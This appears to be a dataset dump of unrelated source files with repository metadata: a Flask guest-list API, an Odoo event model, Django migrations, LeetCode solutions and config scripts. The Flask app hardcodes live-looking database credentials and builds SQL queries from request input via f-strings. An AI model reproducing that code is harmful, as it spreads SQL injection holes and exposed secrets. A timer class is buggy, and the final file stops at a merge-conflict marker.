] | dtrishkin@datanyze.com |
c4f68caa06be6ae613dfb9c9850f0f5a092867aa | dc893a23ea659a9aff10c972202abae113a31f8d | /causal_inference/code/CVPR2012_slidingwindow_action_detection/waterstream_11_9404.py | 58c73a6e5a77a341aea618db12ff70b2b785c21c | [] | no_license | scotfang/research | f28ff4cdcdb579839fddabc7d77a31b324f45a78 | 424e0dce9e5083e75ac49a33765d1a9d7c2878e9 | refs/heads/master | 2021-01-01T17:17:15.633209 | 2014-05-12T18:20:43 | 2014-05-12T18:20:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | temporal_parses = {
2327: { "benddown_START": {"energy": -0.000000, "agent": "uuid1"} },
2468: { "benddown_END": {"energy": -0.000000, "agent": "uuid1"} },
2469: { "benddown_START": {"energy": 0.000000, "agent": "uuid1"} },
2613: { "benddown_END": {"energy": 0.000000, "agent": "uuid1"} },
},
| [
"scotfang@gmail.com"
] | scotfang@gmail.com |
e726941169e7ccc91c362ce921522b6ae2e4cbe5 | 93234feb385b43fc16102bbf69f8588705b21561 | /time.py | 238316ff395e2e934733526f93654b85c23f9182 | [] | no_license | horcham/python | 012046906e3cd35b6bf2286ffcbad60644366adb | c26388312f8fad2d0a88d78761a786761d325b75 | refs/heads/master | 2021-01-12T15:52:56.091319 | 2016-10-04T12:10:26 | 2016-10-04T12:10:26 | 69,321,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,208 | py | #-*- coding:utf-8-*-
#时间元组
#gmtime(),localtime()和strptime()都以时间元组返回
import time
a = time.gmtime()
print(a)
b = time.mktime(a)
print(b)
#分别代表:年、月、日、时、分、秒、星期、一年中第几天、夏令时
c = time.perf_counter()
print(c)
'''
time.altzone
#返回格林威治西部夏令时地区的偏移秒数
time.asctime([t])
#接受时间元组并返回一个可读取的形式为"Tue Dec 11 18:07:14 2015"
time.clock()
#用以浮点数计算的秒数返回当前的CPU时间
time.gmtime([secs])
#接受时间戳(1970后经过的浮点秒数)并返回格林威治时间下的时间元组t
time.localtime([secs])
#接受时间戳(1970后经过的浮点秒数)并返回当地时间下的时间元组t
time.mktime(t)
#接受时间元组并返回时间戳
time.perf_counter()
返回系统运行时间,包括系统睡眠时间
time.process_time()
返回当前进程执行CPU的时间总和,不包括睡眠时间
time.sleep(secs)
推迟条用线程的运行
'''
#定时器
import time as t
class Timer():
def __init__(self):
self.unit = ['年','月','天','小时','分钟','秒']
self.prompt = '未开始计时'
self.lasted = []
self.begin = 0
self.end = 0
#是结果可以直接由对象直接调出来
def __str__(self):
return self.prompt
__repr__ = __str__
#开始计时
def start(self):
self.start = t.localtime()
self.prompt = '提示:先调用 stop()停止计时'
print('计时开始..')
#停止计时
def stop(self):
if not self.begin: #self.begin为0,不为真
print('提示:先调用start()进行计时')
else:
self.stop = t.localtime()
self._calc()
print('计时结束..')
#计算运行时间
def _calc(self):
self.lasted = []
self.prompt = '总共运行了'
for index in range(6):
self.lasted.append(self.stop[index] - self.start[index])
if self.lasted[index]:
self.prompt += (str(self.lasted[index]) + self.unit[index])
#为下一轮计时初始化变量
self.begin = 0
self.end = 0 | [
"690936541@qq.com"
] | 690936541@qq.com |
ff7cecce2015e765e1c37e3bbc6661a5ff53c64c | 29d8603e20c820fa2e7141a136ada3c5853a4974 | /raachem/__init__.py | 79021dbcba2e186f6f4b712e41dcad4f4c8434a7 | [
"MIT"
] | permissive | ricalmang/raachem | 3e76599fd880bce7e11746c5d674125dfb72bba2 | d00d634957a27e43e706c7faa565fb15b3cf154c | refs/heads/master | 2022-12-31T20:00:57.284852 | 2020-10-19T05:54:12 | 2020-10-19T05:54:12 | 236,590,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from raachem.file_class.gjf import *
from raachem.file_class.inp import *
from raachem.file_class.xyz import *
from raachem.file_class.log import *
from raachem.file_creator.e_analysis import *
from raachem.file_creator.input import *
from raachem.file_creator.xyz import *
from raachem.file_creator.deploy_scripts import *
from raachem.util.gen_purp import *
| [
"ricardo_almir@hotmail.com"
] | ricardo_almir@hotmail.com |
22ab383b407c99415b5f7885c0d8c8c564ec0d3c | c4b94158b0ac8f1c4f3d535b6cdee5d1639743ce | /Python/191__Number_of_1_Bits.py | b64ace4b9dd4bc9b74e3c645eb8855f0bfc393c4 | [] | no_license | FIRESTROM/Leetcode | fc61ae5f11f9cb7a118ae7eac292e8b3e5d10e41 | 801beb43235872b2419a92b11c4eb05f7ea2adab | refs/heads/master | 2020-04-04T17:40:59.782318 | 2019-08-26T18:58:21 | 2019-08-26T18:58:21 | 156,130,665 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
result = 0
while n:
if n & 1 == 1:
result += 1
n = n >> 1
return result
# Another solution using a trick of bit
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
result = 0
while n:
result += 1
n = n & (n - 1) # Flip the least significant 1
return result
| [
"junou_cui@berkeley.edu"
] | junou_cui@berkeley.edu |
e6abef9bf3bf91103e722ef652077ea427964e52 | bc599c9a404940fae21ed6b57edb7bb9dc04e71c | /app/graphics/baseGraphic.py | 9402148fb19d3b5ea25e3d5b2212cb4925d18707 | [] | no_license | jcarlosglx/SparkReport | c9b37a1419f113ea13341e6641ceb17056aeb7d0 | 9d6b044f037e8dfe583bcf76c51dd792ac1cc34a | refs/heads/master | 2023-08-11T16:04:28.393856 | 2021-09-21T23:06:08 | 2021-09-21T23:06:08 | 409,001,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | from typing import NoReturn
import matplotlib.pyplot as plt
from pandas import DataFrame
class NonGraphicsBase:
FIRST = 0
class GraphicBase:
def __init__(self, x_figure: int = 10, y_figure: int = 10):
self.x_figure = x_figure
self.y_figure = y_figure
self.FIRST = 0
def _single_template(
self, tittle: str, x_df: DataFrame, y_df: DataFrame
) -> NoReturn:
x_name = x_df.columns[self.FIRST]
y_name = y_df.columns[self.FIRST]
plt.figure(figsize=(self.x_figure, self.y_figure))
plt.grid()
plt.title(f"{tittle}")
plt.ylabel(y_name)
plt.xlabel(x_name)
def _multi_template(
self, tittle: str, x_df: DataFrame, y_df: DataFrame
) -> NoReturn:
x_name = x_df.columns[self.FIRST]
y_name = str([f"{name} " for name in y_df.columns])
plt.figure(figsize=(self.x_figure, self.y_figure))
plt.grid()
plt.title(f"{tittle}")
plt.ylabel(y_name)
plt.xlabel(x_name)
| [
"j.carlosglxg@gmail.com"
] | j.carlosglxg@gmail.com |
6e2e905228e45ea04bc9ad7f82fabc026d4ddd3a | 9c5b08d26c142df75514530166095f52026b6e2f | /app.py | 982fd4a81aa567e0b807761fd2d9370b72ae0409 | [] | no_license | safern/santiagoyregina | 66bb061e5a07b1eba937a3f8bc102d22306b679a | 2aaf475d202bf96efa74c52e653987ce63f5a170 | refs/heads/main | 2023-06-15T11:05:38.964291 | 2021-06-22T20:05:10 | 2021-06-22T20:05:10 | 380,136,631 | 0 | 0 | null | 2021-06-25T05:45:16 | 2021-06-25T05:45:15 | null | UTF-8 | Python | false | false | 3,053 | py | from flask import Flask, jsonify, request
from flaskext.mysql import MySQL
from flask_cors import CORS, cross_origin
from flask_restful import reqparse
app = Flask(__name__)
cors = CORS(app)
app.config['CORS_HEADERS']= 'Content-Type'
app.config['MYSQL_DATABASE_USER'] = 'hae1w0act11g94ma'
app.config['MYSQL_DATABASE_PASSWORD']= 'ubur0jp9tb3e10df'
app.config['MYSQL_DATABASE_DB'] = 'cg0sr7xch3djtgo8'
app.config['MYSQL_DATABASE_HOST'] = 'lyn7gfxo996yjjco.cbetxkdyhwsb.us-east-1.rds.amazonaws.com'
class Database:
def __init__(self):
mysql = MySQL()
mysql.init_app(app)
conn = mysql.connect()
self.cursor = conn.cursor()
parser = reqparse.RequestParser()
#parser.add_argument('invitados', required=True, location='headers')
#self.env = request.headers.get('invitados')
@app.route('/<string:codigo_invitado>', methods=['GET'])
@cross_origin()
def get(codigo_invitado):
if codigo_invitado == 'favicon.ico':
return ''
db = Database()
db.cursor.execute(f'SELECT * FROM info WHERE codigoInvitado = \'{codigo_invitado}\'')
info = db.cursor.fetchall()
print(info)
tickets_recepcion_info = []
tickets_after_info = []
for ticket in info:
if ticket[3] == '':
tickets_after_info.append({
"id": ticket[2],
"nombre": ticket[4]
})
else:
tickets_recepcion_info.append({
"id": ticket[2],
"nombre": ticket[3]
})
return {
"codigo_invitado": codigo_invitado,
"rotulo": info[0][1],
"boletos_recepcion": {
"total": len(tickets_recepcion_info),
"info_boletos": tickets_recepcion_info
},
"boletos_after": {
"total": len(tickets_after_info),
"info_boletos": tickets_after_info
}
}
@app.route('/', methods=['POST'])
@cross_origin()
def post():
db = Database()
data = request.get_json()
codigo_invitado = data.get('codigo_invitado')
db.cursor.execute(f'SELECT * FROM info WHERE codigoInvitado = \'{codigo_invitado}\'')
info = db.cursor.fetchall()
print(info)
if info:
tickets_recepcion_info = []
tickets_after_info = []
for ticket in info:
if ticket[3] == '':
tickets_after_info.append({
"id": ticket[2],
"nombre": ticket[4]
})
else:
tickets_recepcion_info.append({
"id": ticket[2],
"nombre": ticket[3]
})
return {
"codigo_invitado": codigo_invitado,
"rotulo": info[0][1],
"boletos_recepcion": {
"total": 2,
"info_boletos": tickets_recepcion_info
},
"boletos_after": {
"total": 3,
"info_boletos": tickets_after_info
}
}
return 'false'
# PATCH
@app.route('/', methods=['PATCH'])
@cross_origin()
def updateDB():
data = request.get_json()
db = Database()
print(data.get('codigo_invitado'))
# debe recibir arreglo de ids
#tickets = data.get('tickets_array')
#for ticket in tickets:
# db.cursor.execute(f'UPDATE guest SET asiste = 1 WHERE id = \'{ticket}\'')
# db.cursor.connection.commit()
return 'true'
| [
"regina.madero.torres@gmail.com"
] | regina.madero.torres@gmail.com |
75e6a03d5a69e5540503ea26fcf6149bca408aae | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/website_event/models/event.py | da47fe454cee4a971191fe60794ffc5ff9e718f8 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,069 | py | # -*- coding: utf-8 -*-
import pytz
import werkzeug
import json
from harpiya import api, fields, models, _
from harpiya.addons.http_routing.models.ir_http import slug
from harpiya.exceptions import UserError
GOOGLE_CALENDAR_URL = 'https://www.google.com/calendar/render?'
class EventType(models.Model):
_name = 'event.type'
_inherit = ['event.type']
website_menu = fields.Boolean(
'Display a dedicated menu on Website')
class Event(models.Model):
_name = 'event.event'
_inherit = ['event.event', 'website.seo.metadata', 'website.published.multi.mixin']
website_published = fields.Boolean(tracking=True)
subtitle = fields.Char('Event Subtitle', translate=True)
is_participating = fields.Boolean("Is Participating", compute="_compute_is_participating")
cover_properties = fields.Text(
'Cover Properties',
default='{"background-image": "none", "background-color": "oe_blue", "opacity": "0.4", "resize_class": "cover_mid"}')
website_menu = fields.Boolean('Dedicated Menu',
help="Creates menus Introduction, Location and Register on the page "
" of the event on the website.", copy=False)
menu_id = fields.Many2one('website.menu', 'Event Menu', copy=False)
def _compute_is_participating(self):
# we don't allow public user to see participating label
if self.env.user != self.env['website'].get_current_website().user_id:
email = self.env.user.partner_id.email
for event in self:
domain = ['&', '|', ('email', '=', email), ('partner_id', '=', self.env.user.partner_id.id), ('event_id', '=', event.id)]
event.is_participating = self.env['event.registration'].search_count(domain)
else:
self.is_participating = False
@api.depends('name')
def _compute_website_url(self):
super(Event, self)._compute_website_url()
for event in self:
if event.id: # avoid to perform a slug on a not yet saved record in case of an onchange.
event.website_url = '/event/%s' % slug(event)
@api.onchange('event_type_id')
def _onchange_type(self):
super(Event, self)._onchange_type()
if self.event_type_id:
self.website_menu = self.event_type_id.website_menu
def _get_menu_entries(self):
""" Method returning menu entries to display on the website view of the
event, possibly depending on some options in inheriting modules. """
self.ensure_one()
return [
(_('Introduction'), False, 'website_event.template_intro'),
(_('Location'), False, 'website_event.template_location'),
(_('Register'), '/event/%s/register' % slug(self), False),
]
def _toggle_create_website_menus(self, vals):
for event in self:
if 'website_menu' in vals:
if event.menu_id and not event.website_menu:
event.menu_id.unlink()
elif event.website_menu:
if not event.menu_id:
root_menu = self.env['website.menu'].create({'name': event.name, 'website_id': event.website_id.id})
event.menu_id = root_menu
for sequence, (name, url, xml_id) in enumerate(event._get_menu_entries()):
event._create_menu(sequence, name, url, xml_id)
@api.model
def create(self, vals):
res = super(Event, self).create(vals)
res._toggle_create_website_menus(vals)
return res
def write(self, vals):
res = super(Event, self).write(vals)
self._toggle_create_website_menus(vals)
return res
def _create_menu(self, sequence, name, url, xml_id):
if not url:
self.env['ir.ui.view'].search([('name', '=', name + ' ' + self.name)]).unlink()
newpath = self.env['website'].new_page(name + ' ' + self.name, template=xml_id, ispage=False)['url']
url = "/event/" + slug(self) + "/page/" + newpath[1:]
menu = self.env['website.menu'].create({
'name': name,
'url': url,
'parent_id': self.menu_id.id,
'sequence': sequence,
'website_id': self.website_id.id,
})
return menu
def google_map_img(self, zoom=8, width=298, height=298):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_img(zoom=zoom, width=width, height=height)
return None
def google_map_link(self, zoom=8):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_link(zoom=zoom)
return None
def _track_subtype(self, init_values):
self.ensure_one()
if 'is_published' in init_values and self.is_published:
return self.env.ref('website_event.mt_event_published')
elif 'is_published' in init_values and not self.is_published:
return self.env.ref('website_event.mt_event_unpublished')
return super(Event, self)._track_subtype(init_values)
def action_open_badge_editor(self):
""" open the event badge editor : redirect to the report page of event badge report """
self.ensure_one()
return {
'type': 'ir.actions.act_url',
'target': 'new',
'url': '/report/html/%s/%s?enable_editor' % ('event.event_event_report_template_badge', self.id),
}
def _get_event_resource_urls(self):
url_date_start = self.date_begin.strftime('%Y%m%dT%H%M%SZ')
url_date_stop = self.date_end.strftime('%Y%m%dT%H%M%SZ')
params = {
'action': 'TEMPLATE',
'text': self.name,
'dates': url_date_start + '/' + url_date_stop,
'details': self.name,
}
if self.address_id:
params.update(location=self.sudo().address_id.contact_address.replace('\n', ' '))
encoded_params = werkzeug.url_encode(params)
google_url = GOOGLE_CALENDAR_URL + encoded_params
iCal_url = '/event/%d/ics?%s' % (self.id, encoded_params)
return {'google_url': google_url, 'iCal_url': iCal_url}
def _default_website_meta(self):
res = super(Event, self)._default_website_meta()
event_cover_properties = json.loads(self.cover_properties)
# background-image might contain single quotes eg `url('/my/url')`
res['default_opengraph']['og:image'] = res['default_twitter']['twitter:image'] = event_cover_properties.get('background-image', 'none')[4:-1].strip("'")
res['default_opengraph']['og:title'] = res['default_twitter']['twitter:title'] = self.name
res['default_opengraph']['og:description'] = res['default_twitter']['twitter:description'] = self.subtitle
res['default_twitter']['twitter:card'] = 'summary'
res['default_meta_description'] = self.subtitle
return res
def get_backend_menu_id(self):
return self.env.ref('event.event_main_menu').id
| [
"yasir@harpiya.com"
] | yasir@harpiya.com |
0a329acc24c038ab643e23fad78081243efc3c1a | 37a331ad48e0a2855921b387dde09eb363096a57 | /Connections/FileConnection.py | b6eceef81ce6f12d0e80b4ee00ce889809a64c83 | [] | no_license | markbdsouza/db-data-comparison | 3fbcff3290938d0d2419216fc30cd80481f38d8a | 28fbbce92665798195762109e3c118def4a082ee | refs/heads/master | 2023-01-08T20:11:41.089934 | 2020-11-17T14:17:52 | 2020-11-17T14:17:52 | 312,645,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 750 | py | from Config.CONSTANTS import INPUT_FILE_PATH_STRING
from Config.ReadConfig import read_csv_connection_variables, read_txt_connection_variables
from DataframeLogic.GenericDFActivities import create_data_frame_from_csv, create_data_frame_from_txt
def fetch_csv_data_frame():
"""Create and return the CSV data frame"""
file_name = read_csv_connection_variables()
file_path = INPUT_FILE_PATH_STRING.format(file_name)
return create_data_frame_from_csv(file_path)
def fetch_txt_data_frame():
"""Create and return the TXT data frame given the delimiter"""
file_name, delimiter = read_txt_connection_variables()
file_path = INPUT_FILE_PATH_STRING.format(file_name)
return create_data_frame_from_txt(file_path, delimiter)
| [
"mark.benjamin.dsouza@gmail.com"
] | mark.benjamin.dsouza@gmail.com |
2d1dbde168c0b5be9449c6a08430280a959a5fbb | e1b5e4862052f46bcf8462ffea293bcdb470bc61 | /LISTTEST/tex.py | e0f1b1ea5e70cbbca11dd78b3e8cc85ab7ea4119 | [] | no_license | AODQ/python-crap | 518066228c76ebdfd64ae475e7b4f8d5ddc191f4 | b63b3961bf920da476b1066e35c16ec5b46e885f | refs/heads/master | 2021-08-23T00:05:50.393675 | 2017-12-01T20:40:00 | 2017-12-01T20:40:00 | 103,435,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | import os
print('Lₒ(P, ωₒ) = Lₑ(P, ωₒ) + ∫Ω F(P, ωᵢ, ωₒ) Lᵢ(P, ωᵢ) cosθᵢ dωᵢ')
Lₒ = 0.0
for i in range(0, 10):
ωₒ = i*0.2
Lₒ += ωₒ
print(Lₒ)
| [
"aodq@gmail.com"
] | aodq@gmail.com |
4212291d22bbe503767aaaab0223898ec6224d74 | 89eaed21673a816679d3c2feeb3300aede574bb2 | /fei/app_models/migrations/0008_auto_20200422_1048.py | eb0787efe1f5d39c833ed606991134d9f945f7f6 | [] | no_license | colingong/fei | bd0c8530025963a7d4c3abe9399fc5c25d2f301b | 2f25ac79813508401f1481034dcbf9ce3585bf1e | refs/heads/master | 2022-12-09T03:27:10.469450 | 2020-06-24T06:28:51 | 2020-06-24T06:28:51 | 249,641,609 | 11 | 1 | null | 2022-12-08T03:53:06 | 2020-03-24T07:33:51 | Python | UTF-8 | Python | false | false | 390 | py | # Generated by Django 2.2.11 on 2020-04-22 02:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app_models', '0007_delete_proxytoken'),
]
operations = [
migrations.RenameField(
model_name='warehouse',
old_name='warehouse_type_name',
new_name='warehouse_name',
),
]
| [
"colingong@hotmail.com"
] | colingong@hotmail.com |
f9b74976cf3a863630b6f91560e2d0fadb3eb995 | c421dd51e0e6a4ce84e75724989ac52efcecf15b | /tool/migrations/0050_alter_shoppinglist_name.py | cc524029bb2e3b1f534678ffd8ae0eb664e77065 | [
"MIT"
] | permissive | mikekeda/tools | 3bdbfcbc495bd9b53e2849431c8d8f098149925d | 51a2ae2b29ae5c91a3cf7171f89edf225cc8a6f0 | refs/heads/master | 2023-06-09T09:13:35.142701 | 2023-06-06T17:27:18 | 2023-06-06T17:27:18 | 120,110,752 | 0 | 1 | MIT | 2023-05-23T14:15:43 | 2018-02-03T16:56:57 | Python | UTF-8 | Python | false | false | 434 | py | # Generated by Django 3.2.3 on 2021-05-30 09:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tool', '0049_auto_20210308_0847'),
]
operations = [
migrations.AlterField(
model_name='shoppinglist',
name='name',
field=models.CharField(default='Groceries', max_length=32, verbose_name='list name'),
),
]
| [
"mriynuk@gmail.com"
] | mriynuk@gmail.com |
7314dd1ce978a7d2053f03d14e1596873e990784 | 90c4d97afceb51c9827e0c29cfa5703873644898 | /android_autotools/__main__.py | 816120d4abe7edbd6f2cda8892c7f8c9f6e0013f | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | fred104/android-autotools | e6e7de6385b6532afac4248bf5bf1addaeaf19eb | 8566524f11d9551a42451178eb8c119e57e9441b | refs/heads/master | 2021-01-23T03:12:43.472904 | 2017-02-04T06:19:33 | 2017-02-04T06:19:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,219 | py | #!/usr/bin/env python3
import argparse
import os
import sys
import json
import os.path
import subprocess
import android_autotools
def main():
a = argparse.ArgumentParser(prog='abuild',
description='A wrapper around autotools for Android.',
epilog='NDK_HOME must be defined to use this tool.')
a.add_argument('--version', action='version',
version="%(prog)s (android_autotools) {}".format(
android_autotools.__version__))
a.add_argument('-v', dest='verbose', action='store_true',
help="verbose output")
g = a.add_argument_group('build options')
g.add_argument('-a', dest='arch', metavar='arch', action='append',
help="override architectures in provided build file")
g.add_argument('-o', metavar='dir', dest='output_dir',
default='.', help="output directory for build (default: cwd)")
g.add_argument('-R', dest='release', action='store_true',
help="build release (default: debug)")
a.add_argument('-f', dest='config', default='abuild.json',
type=argparse.FileType('r'),
help='build from supplied JSON build file')
args = a.parse_args()
conf = json.load(args.config)
args.config.close()
if 'NDK_HOME' not in os.environ:
print("ERROR: NDK_HOME must be defined.")
return 1
output_dir = os.path.abspath(args.output_dir)
conf_dir = os.path.dirname(args.config.name)
build = android_autotools.BuildSet(
os.environ['NDK_HOME'],
output_dir,
release=args.release,
archs=args.arch or conf.get('archs', android_autotools.ARCHS),
verbose=args.verbose)
for t in conf['targets']:
build.add(os.path.join(conf_dir, t['path']),
t['output'],
*t['configure'],
inject=t.get('inject', None),
cpp=t.get('c++', False))
try:
res = build.run()
return 0 if res is not False else 1
except Exception as e:
if args.verbose:
raise e
print(e)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| [
"brendan@bbqsrc.net"
] | brendan@bbqsrc.net |
c9df6ac92ac8959e2f091582fbbc2c9b4c356a4b | 34de2b3ef4a2478fc6a03ea3b5990dd267d20d2d | /Python/science/sympy/solve_system_of_lin_eqns_using_sympy.py | b4d8f00eeca664484914e2ac4c57a7927627fd97 | [
"MIT"
] | permissive | bhishanpdl/Programming | d4310f86e1d9ac35483191526710caa25b5f138e | 9654c253c598405a22cc96dfa1497406c0bd0990 | refs/heads/master | 2020-03-26T06:19:01.588451 | 2019-08-21T18:09:59 | 2019-08-21T18:09:59 | 69,140,073 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author : Bhishan Poudel; Physics PhD Student, Ohio University
# Date : Oct 04, 2016
# Last update :
#
#
# Imports
from __future__ import division, unicode_literals, print_function
import numpy
import scipy.linalg
from sympy import symbols,solve
w,x,y,z = symbols('w, x, y, z')
eq1 = 3*w + x -1
eq2 = 4*w + x + z -2
eq3 = x -y + 19.9*z + 1
eq4 = 4*w - y + 4*z - 1
ans = solve([eq1, eq2,eq3,eq4], (w,x, y,z))
# answer
# {x: -1.47598253275109, w: 0.825327510917031, z: 0.174672489082969, y: 3.00000000000000}
# w = 0.8253275109170306
# x = -1.4759825327510923
# y = 3.000000000000001
# z = 0.17467248908296953
| [
"bhishantryphysics@gmail.com"
] | bhishantryphysics@gmail.com |
e0060018e6710ebdfebe141244402b1830d09827 | bb7fc0a16a824c836b96150c9575879ed1d4d866 | /chatMain/chatblog/models.py | 5e11e6df51a32d0362cd65dda5e34bd2be9a287d | [] | no_license | adarshmanwal/ATG_PART_2 | 5f62432178ec1a1dd0fe978024a546d1951fa673 | a84cb6f7553998571bbc4b23bfb5643450cf04dd | refs/heads/main | 2023-07-08T03:33:59.422029 | 2021-08-12T12:23:39 | 2021-08-12T12:23:39 | 393,096,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | from django.db import models
from django.db.models.deletion import CASCADE
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
# Create your models here.
class post(models.Model):
content=models.TextField()
date_posted=models.DateTimeField(default=timezone.now)
author=models.ForeignKey(User,on_delete=models.CASCADE)
def __str__(self):
return self.content
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk': self.pk}) | [
"deepak.manwal@gmail.com"
] | deepak.manwal@gmail.com |
a71513cedd0cde5dc3fa0262fd7f5dc00c14565d | 506f9677a767bacad853f62c8d4bd7968c8c6a38 | /test.py | 891ddc1f64b48126233c8d0a13f3e490d34c19a2 | [] | no_license | danieldcl/Big-Data-Management-and-Analysis-1-BDM- | 17bd2159ec4b573081221416f96b463d62f8486f | e8d7ee8813f97d6258f79bdeeea082b1e09e4fa8 | refs/heads/master | 2021-01-10T12:47:36.832337 | 2016-03-17T18:30:29 | 2016-03-17T18:30:29 | 54,141,081 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,241 | py | import sys
import urllib2
import json
import csv
if __name__=='__main__':
with open(sys.argv[1], 'r') as jfile:
bus_data = json.load(jfile)
active_bus = bus_data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery'][0]['VehicleActivity']
num_bus = len(active_bus)
with open(sys.argv[2], 'wb') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['Latitude', 'Longitude', 'Stop Name', 'Stop Status'])
for s in range(num_bus):
latitude = active_bus[s]['MonitoredVehicleJourney']['VehicleLocation']['Latitude']
longitude = active_bus[s]['MonitoredVehicleJourney']['VehicleLocation']['Longitude']
stop_name = "N/A"
stop_status = "N/A"
if active_bus[s]['MonitoredVehicleJourney']['OnwardCalls'] != "":
stop_name = active_bus[s]['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall'][0]['StopPointName']
stop_status = active_bus[s]['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall'][0]['Extensions']['Distances']['PresentableDistance']
row = [latitude, longitude, stop_name, stop_status]
writer.writerow(row)
| [
"dcliao92@gmail.com"
] | dcliao92@gmail.com |
84de335910a749a5a75b081e33561549701280e9 | 3ff80a99a95b9c0e13d9452eaa37419335e846ed | /VgammaTuplizer_normalfixed/Ntuplizer/crabconfigs/crab_MC2017ZJetsToQQ_HT400to600.py | 17a82a4951a08d04b9bf88d1728ce4f4e3d0a0f0 | [] | no_license | XL-Seb-Yan/WGammaProducer | 9a58a109c6a8429ce29c9d213864d32f8c33ff50 | 7d1edb4707b5eb60f9d5fe475b8ae347879372e6 | refs/heads/master | 2022-01-15T20:00:59.992103 | 2019-07-03T08:10:55 | 2019-07-03T08:10:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'Wgamma2017_ZJetsToQQ_HT400to600_%s'%"Jul18"
config.General.workArea = 'crab_jobs_WgammaMC_2017_%s'%"Jul18"
config.General.transferOutputs = True
config.General.transferLogs = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'VgammaTuplizer/Ntuplizer/config_generic.py'
config.JobType.inputFiles=[]
config.JobType.sendExternalFolder = True
config.Data.inputDataset = '/ZJetsToQQ_HT400to600_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall17MiniAODv2-PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/MINIAODSIM'
config.Data.inputDBS = 'global'
config.Data.splitting = 'LumiBased'
config.Data.unitsPerJob = 30
config.Data.outLFNDirBase = '/store/user/%s/' % (getUsernameFromSiteDB())
config.Data.publication = False
config.Data.outputDatasetTag = 'Wgamma2017_ZJetsToQQ_HT400to600_%s'%"Jul18"
config.Site.storageSite = 'T3_US_FNALLPC'
| [
"xlyan0636@gmail.com"
] | xlyan0636@gmail.com |
f5b1709e79c2e79d06b7f94bf42ed7a723bccbf5 | 6f38cba464b2581875ae2e07ec5e15571cbf03db | /PythonBlog/dataModels/vo/tagVO.py | 9cada191c81a70d1c8e3d86ca647b0d991f60313 | [
"MIT"
] | permissive | Nohysiwe/FastAPIBlogBackend | 7c12100f2903c0ac86dc3932e8c8536408b5d7e1 | 2052c630a1a6e9bb9e6555f734c60020b107afc8 | refs/heads/main | 2023-04-19T16:37:56.459431 | 2021-05-21T03:53:55 | 2021-05-21T03:53:55 | 369,404,160 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py |
from typing import Optional
from pydantic import BaseModel, Field
__all__ = [
"TagVO",
]
class TagVO(BaseModel):
"""
标签 数据对象
"""
id: Optional[int] = Field(
None,
description = "标签id"
)
tagName: str = Field(
... ,
description = "标签名"
)
| [
"nohysiwe@163.com"
] | nohysiwe@163.com |
138f3980a1ed3012410d1099b138889cb25b7b8b | 3d39974209f890080456c5f9e60397c505540c64 | /0x0C-python-almost_a_circle/10-main.py | 72e7fa2d845bb5a79e7d1be760d234ee13cbc862 | [] | no_license | salmenz/holbertonschool-higher_level_programming | 293ca44674833b587f1a3aec13896caec4e61ab6 | 23792f8539db48c8f8200a6cdaf9268d0cb7d4e6 | refs/heads/master | 2020-09-28T11:42:51.264437 | 2020-05-13T22:56:39 | 2020-05-13T22:56:39 | 226,771,568 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | #!/usr/bin/python3
""" 10-main """
from models.square import Square
if __name__ == "__main__":
s1 = Square(5)
print(s1)
print(s1.size)
s1.size = 10
print(s1)
try:
s1.size = "9"
except Exception as e:
print("[{}] {}".format(e.__class__.__name__, e))
| [
"salmen.zooro@gmail.com"
] | salmen.zooro@gmail.com |
c682c3d6b8228f2c6375fc241c377d4b1c3903de | 699b767e854162231914f4bce177382a9880f221 | /DFS/TreeMaxPathSum.py | 182314417155c65a2857262db0bdf7177a5a9278 | [] | no_license | XiwangLi/LeetcodeArchive | a66dc32f0a7248ff05cbe09dd0095191fefc602f | 3de4a48f9f7de2970cf02751c1620281bae0947d | refs/heads/master | 2021-04-28T02:57:55.604505 | 2019-02-28T01:07:51 | 2019-02-28T01:07:51 | 122,128,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,571 | py | <<<<<<< HEAD
# Binary Tree Maximum Path Sum
# Does not need to go through the root or leaf
class Solution(object):
def maxPathSum(self, root):
"""
:type root: TreeNode
:rtype: int
"""
res = [-float('inf')]
self.DFSpathSum(root, res)
return res[0]
